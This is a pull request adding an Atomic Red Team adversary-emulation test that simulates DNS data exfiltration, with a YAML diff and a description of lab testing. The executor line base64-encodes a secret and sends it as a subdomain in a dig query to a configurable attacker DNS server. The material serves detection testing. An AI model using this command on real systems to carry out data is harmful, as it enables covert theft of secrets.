### PR TITLE
New Atomic - Exfiltrate Data using DNS Queries via dig

### DIFF
--- a/atomics/T1048/T1048.yaml
+++ b/atomics/T1048/T1048.yaml
@@ -96,3 +96,34 @@ atomic_tests:
       Import-Module "#{ps_module}"
       Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
     name: powershell
+- name: Exfiltrate Data using DNS Queries via dig
+  description: |
+    This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and 
+    making DNS queries via the dig command to a controlled DNS server.
+  supported_platforms:
+    - macos
+    - linux
+  input_arguments:
+    dns_port:
+      type: integer
+      default: '53'
+      description: Attacker's DNS server port
+    attacker_dns_server:
+      type: string
+      default: 8.8.8.8
+      description: Attacker's DNS server address
+    secret_info:
+      type: string
+      default: this is a secret info
+      description: secret info that will be exfiltirated
+  dependency_executor_name: bash
+  dependencies:
+    - description: dig command
+      prereq_command: which dig
+      get_prereq_command: |
+        which apt && sudo apt update && sudo apt install -y bind9-dnsutils || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf install -y bind-utils || which apk && sudo apk add bind-tools || which pkg && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew update && brew install --quiet bind
+  executor:
+    command: |
+      dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
+    name: bash
+    elevation_required: false


### PR DESCRIPTION
**Details:**
This pull request provides an atomic test focusing on DNS-based data exfiltration techniques via the `dig` command. The test encodes input data in base64 format and sends it as a subdomain within a DNS query to a configurable attacker's DNS server. Input arguments allow for specifying the DNS server's address and port as well as the sensitive information to be encoded. The `dig` command is validated and installed dynamically using multiple package managers to ensure broad platform compatibility.

**Testing:**
The attack scenario was successfully executed, during which the secret data was encoded, sent as part of a DNS query, and subsequently captured by a DNS server hosted on a Docker container. This setup highlights the ability to simulate data exfiltration via DNS and verify the communication flow in a controlled environment.

Screenshots:
![image](https://github.com/user-attachments/assets/b81839d3-d70b-4119-8df5-4323f6504680)

![image](https://github.com/user-attachments/assets/b10267af-fdb1-4e28-830a-ba04b584793b)
